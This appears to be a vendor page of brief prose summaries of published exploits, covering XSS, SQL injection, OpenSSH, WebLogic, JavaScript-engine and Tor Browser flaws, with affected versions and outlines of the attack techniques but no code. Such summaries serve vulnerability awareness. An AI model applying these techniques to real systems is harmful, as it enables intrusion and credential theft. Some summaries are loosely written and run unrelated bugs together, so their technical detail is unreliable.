This PoC exploit is for a buffer overflow vulnerability in the global optimization phase of a program. The exploit is written in JavaScript and uses a loop to overflow the buffer with the string 'AAAAAAAAAA' + str + 'BBBBBBBBBB'. The loop runs 200 times, which is enough to cause the buffer to overflow.
BoundFunction::NewInstance is used to handle calls to a bound function. The method first allocates a new argument array and copies the prepended arguments and others into the new argument array and calls the actual function. The problem is, it doesn't care about the CallFlags_ExtraArg flag which indicates that there's an extra argument (new.target in the PoC) at the end of the argument array. So the size of the new argument array created with the CallFlags_ExtraArg flag will be always 1 less then required, this leads to an OOB read.
This issue is similar to the issue 1429 (MSRC 42111). It might need to refresh the page several times to observe a crash. The PoC code creates a Uint32Array of 1000 elements and then iterates over it, setting each element to 0x1234. This can lead to a memory corruption.
A buffer overflow vulnerability exists in Linux Awk to Perl Translator '/usr/bin/a2p' version 1.007-5. By supplying a long string of 'A' characters to the program, a segmentation fault can be triggered. This can be exploited to execute arbitrary code.
Instagram-clone Script 2.0 is vulnerable to Cross-Site Scripting. This vulnerability is due to insufficient sanitization of user-supplied input in the 'edit_requests.php' file. An attacker can exploit this vulnerability to execute arbitrary HTML and script code in the browser of the victim in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This exploit is based on a misconfiguration vulnerability in OpenSSH versions 6.6 and below. It was originally discovered by Jann Horn and further developed by Adam Simuntis and Mindaugas Slusnys. The exploit uses the Paramiko library to connect to the SSH server and then downloads the /proc/self/maps file to identify the address of the libc library. It then downloads the libc library and extracts the system() and exit() addresses. It then builds a payload which is written to the remote system and executed. The payload contains a RET slide which is used to execute the system() command with the command specified in the payload.
We have discovered a time-based blind SQL injection vulnerability in the ELO Access Manager (<= 9.17.120 and <= 10.17.120) component that makes it possible to read all database content. The vulnerability exists in the HTTP GET parameter 'ticket'. For example, we succeeded in reading the password hash of the administrator user in the 'userdata' table from the 'eloam' database.
This script is the first public exploit/POC for exploiting CVE-2017-3248, a vulnerability in Oracle WebLogic RMI Registry UnicastRef Object Java Deserialization that allows for remote code execution. It checks if a WebLogic server is vulnerable and needs the last version of Ysoserial. Affected versions are 10.3.6.0, 12.1.3.0, 12.2.1.0, and 12.2.1.1.
This exploit is a proof of concept for a use after free vulnerability in Tor Browser. The exploit is triggered by creating a frameset element, appending a child element to it, and then adding a DOMAttrModified event listener to the frameset. This causes a use after free vulnerability, which can be used to cause a denial of service.
SeoChecker Umbraco CMS Plug-in version 1.9.2 is vulnerable to stored cross-site scripting vulnerability in two parameters which are SEO title and SEO description HTML parameters fields. A low privilege authenticated user who can edit the SEO tab parameter value for any Ubmraco CMS content like an article will be able to inject a malicious code to execute arbitrary HTML and JS code in a user's browser session in the context of an affected site.
Services By CQR